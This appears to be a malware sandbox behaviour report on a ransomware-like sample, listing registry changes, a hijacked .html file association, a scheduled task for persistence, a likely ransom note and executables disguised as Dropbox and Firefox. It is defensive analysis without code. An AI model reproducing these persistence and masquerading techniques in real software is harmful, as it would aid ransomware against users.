Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\TypedURLs C:\Windows\system32\taskmgr.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\dwm.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133895701868183330" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\dwm.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "%windir%\\Speech_OneCore\\Engines\\SR\\ja-JP-N\\L1041" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = 040000000500000003000000020000000100000000000000ffffffff C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\7\NodeSlot = "18" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202020202 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{D6D9E004-CD87-442B-9D57-5E0AEB4F6F72}\GroupByDirection = "1" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\5 C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Loki\shell\open C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "%windir%\\Speech_OneCore\\Engines\\SR\\ja-JP-N\\lsr1041.lxa" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "Microsoft Speech SW Voice Activation - Japanese (Japan)" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.html C:\Windows\SysWOW64\cmd.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "16000" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).right = "1216" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2 = 14002e80922b16d365937a46956b92703aca08af0000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656} C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "MS-1033-110-WINMO-DNN" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "spell=NativeSupported; cardinal=GlobalSupported; ordinal=NativeSupported; date=GlobalSupported; time=GlobalSupported; telephone=NativeSupported; currency=NativeSupported; url=NativeSupported; address=NativeSupported; alphanumeric=NativeSupported; message=NativeSupported; computer=NativeSupported" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "Microsoft Speech Recognition Engine - es-ES Embedded DNN v11.1" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "CC" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "11.0" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.html\ = "NotSoCleverBotFile" C:\Windows\SysWOW64\cmd.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "{37A9D401-0BF5-4366-9530-C75C6DC23EC9}" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "%windir%\\Speech_OneCore\\Engines\\TTS\\de-DE\\M1031Hedda" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "%windir%\\Speech_OneCore\\Engines\\TTS\\en-US\\MSTTSLocenUS.dat" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "German Phone Converter" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "%windir%\\Speech_OneCore\\Engines\\SR\\it-IT-N\\tn1040.bin" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "Microsoft David - English (United States)" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1280x720x96(1).y = "4294967295" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "5223743" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "%windir%\\Speech_OneCore\\Engines\\SR\\es-ES-N\\AI043082" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "%windir%\\Speech_OneCore\\Engines\\SR\\it-IT-N\\c1040.fe" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = 0400000003000000020000000100000000000000ffffffff C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\CortanaVoices\\Tokens\\MSTTS_V110_enUS_EvaM" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "Microsoft Cosimo" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\SniffedFolderType = "Documents" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\7\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHost_ = 6801000088020000 C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "- 0001 ! 0002 & 0003 , 0004 . 0005 ? 0006 _ 0007 1 0008 ~ 0009 aa 000a a 000b oh 000c ax 000d b 000e d 000f eh 0010 ey 0011 f 0012 g 0013 hy 0014 uy 0015 iy 0016 k 0017 l 0018 m 0019 n 001a ng 001b nj 001c oe 001d eu 001e ow 001f p 0020 r 0021 s 0022 sh 0023 t 0024 uw 0025 v 0026 w 0027 y 0028 z 0029 zh 002a" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A
N/A N/A C:\Windows\System32\NOTEPAD.EXE N/A
N/A N/A C:\Windows\System32\Notepad.exe N/A

Runs net.exe

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
